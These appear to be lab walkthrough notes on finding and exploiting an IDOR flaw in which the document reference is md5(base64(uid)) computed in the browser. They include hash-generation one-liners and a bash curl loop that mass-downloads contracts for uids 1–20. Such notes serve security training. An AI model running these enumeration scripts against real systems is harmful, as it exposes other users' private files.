ENCODED REFERENCES

a secure direct object reference scheme uses encoded references to make IDOR enumeration more difficult. one way to circumvent this and identify a potential IDOR behind encoded references is when the web developers make the mistake of performing sensitive functions on the front-end (aka function disclosure), so the encoding logic is readable by the client.

#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port}
 Documents
 Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
 <li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/contracts.php > CTRL+U
 <li class="pure-tree_link">...
 
  ...
 javascript:downloadContract('1')
 
 function downloadContract(uid) {
    $.redirect("/download.php", {
        contract: CryptoJS.MD5(btoa(uid)).toString(),
    }, "POST", "_self");
 }
 
 * this function sends a POST request with a contract parameter. the value it sends is an md5 hash computed with the CryptoJS library.
   the value being hashed is btoa(uid), the base64 encoded string of the uid argument passed to the function.
   the page calls downloadContract('1'), so the final value used in the POST request is the base64 encoding of 1, then md5 hashed. because the whole derivation runs client-side, the reference is predictable for any uid.
 
#IDOR identification & testing
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  POST /download.php HTTP/1.1
  Host: 94.237.62.184:42702
  Origin: http://94.237.62.184:42702
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.62.184:42702/

  uid=1
  
  * ALT: on some occasions the data is sent in an encoded form, such as:
     - data
        - contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
        - uid=MQ%3D%3D
     - URL
        - /download.php?contract=MQ%3D%3D

root@oco:~$ echo -n 1 | base64 -w 0 | md5sum | tr -d ' -'
 cdd96d3cc73d1dbdaffa03cc6cd7339b
 * the -n flag tells echo to omit the trailing newline, so only the bare uid is base64 encoded
 * the -w 0 flag with base64 disables line wrapping so no newlines are added to the encoded value

 * compare this with the hash on the HTTP request (if used)

#test manual download
root@oco:~$ for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
 cdd96d3cc73d1dbdaffa03cc6cd7339b
 0b7e7dee87b1c3b98e72131173dfbbbf
 0b24df25fe628797b3a50ae0724d2730
 f7947d50da7a043693a592b4db43b0a1
 8b9af1f7f76daf0f02bd9c48c4a2e3d0
 006d1236aee3f92b8322299796ba1989
 b523ff8d1ced96cef9c86492e790c2fb
 d477819d240e7d3dd9499ed8d23e7158
 3e57e65a34ffcb2e93cb545d024f5bde
 5d4aace023dc088767b4e08c79415dcd
 
 * compare each output to the values on the Repeater
 
BURP > Repeater
 Request
  ...
  GET /download.php?contract=MQ%3D%3D HTTP/1.1
  Host: 94.237.62.184:34855
  Referer: http://94.237.62.184:34855/contracts.php
 Response
  HTTP/1.1 200 OK
  Date: Tue, 31 Dec 2024 03:13:25 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Description: File Transfer
  Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
  Pragma: public
  Content-Type: application/pdf

#download all documents from all employees with uids between 1-20
root@oco:~$ nano encodedReferences.sh
#!/bin/bash

# target endpoint; the contract parameter is sent in the POST body, not the URL
url="http://94.237.50.242:58709/download.php"

for i in {1..20}; do
    # reproduce the front-end encoding: md5(base64(uid))
    hash=$(echo -n "$i" | base64 -w 0 | md5sum | tr -d ' -')
    # -O saves to a file, -J names it from Content-Disposition, --data-urlencode URL-encodes the POST body
    curl -sOJ --data-urlencode "contract=$hash" "$url"
done

 * The --data-urlencode option in curl is used to URL-encode data before sending it 
   in the request. This is useful when you need to ensure that special characters in 
   parameters (like spaces, symbols, or non-ASCII characters) are properly encoded in 
   a URL-safe manner.
    - When using --data-urlencode, curl automatically encodes the value of a parameter 
      so that it can be safely included in a URL or HTTP request body.
 * the -J flag (--remote-header-name):
    - instructs curl to use the filename provided by the server in the Content-Disposition response header, if available (it requires -O).
       - if the server responds with a header such as Content-Disposition: attachment; filename="example.txt", curl saves the downloaded file as example.txt instead of the default behavior (saving it with the last segment of the URL).

root@oco:~$ bash ./encodedReferences.sh
root@oco:~$ ls
 contract_1679091c5a880faf6fb5e6087eb1b2dc.pdf
 contract_1f0e3dad99908345f7439f8ffabdffc4.pdf
 contract_45c48cce2e2d7fbdea1afc51c7c6ad26.pdf
 contract_6512bd43d9caa6e02c990b0a82652dca.pdf
 contract_6f4922f45568161a8cdf4ad2299f6d23.pdf
 contract_70efdf2ec9b086079795c442636b55fb.pdf
 contract_8f14e45fceea167a5a36dedd4bea2543.pdf
 contract_98f13708210194c475687be6106a3b84.pdf
 contract_9bf31c7ff062936a96d3c8bd1f8f2ff3.pdf
 contract_a87ff679a2f3e71d9181a67b7542122c.pdf
 contract_aab3238922bcc25a6f606eb525ffdc56.pdf
 contract_c20ad4d76fe97759aa27a0c99bff6710.pdf
 contract_c4ca4238a0b923820dcc509a6f75849b.pdf
 contract_c51ce410c124a10e0db5e4b97fc2af39.pdf
 contract_c74d97b01eae257e44aa9d5bade97baf.pdf
 contract_c81e728d9d4c2f636f067f89cc14862c.pdf
 contract_c9f0f895fb98ab9159f51fd0297e236d.pdf
 contract_d3d9446802a44259755d38e6d163e820.pdf
 contract_e4da3b7fbbce2345d7772b0674a318d5.pdf
 contract_eccbc87e4b5ce2fe28308fd9f2a7baf3.pdf
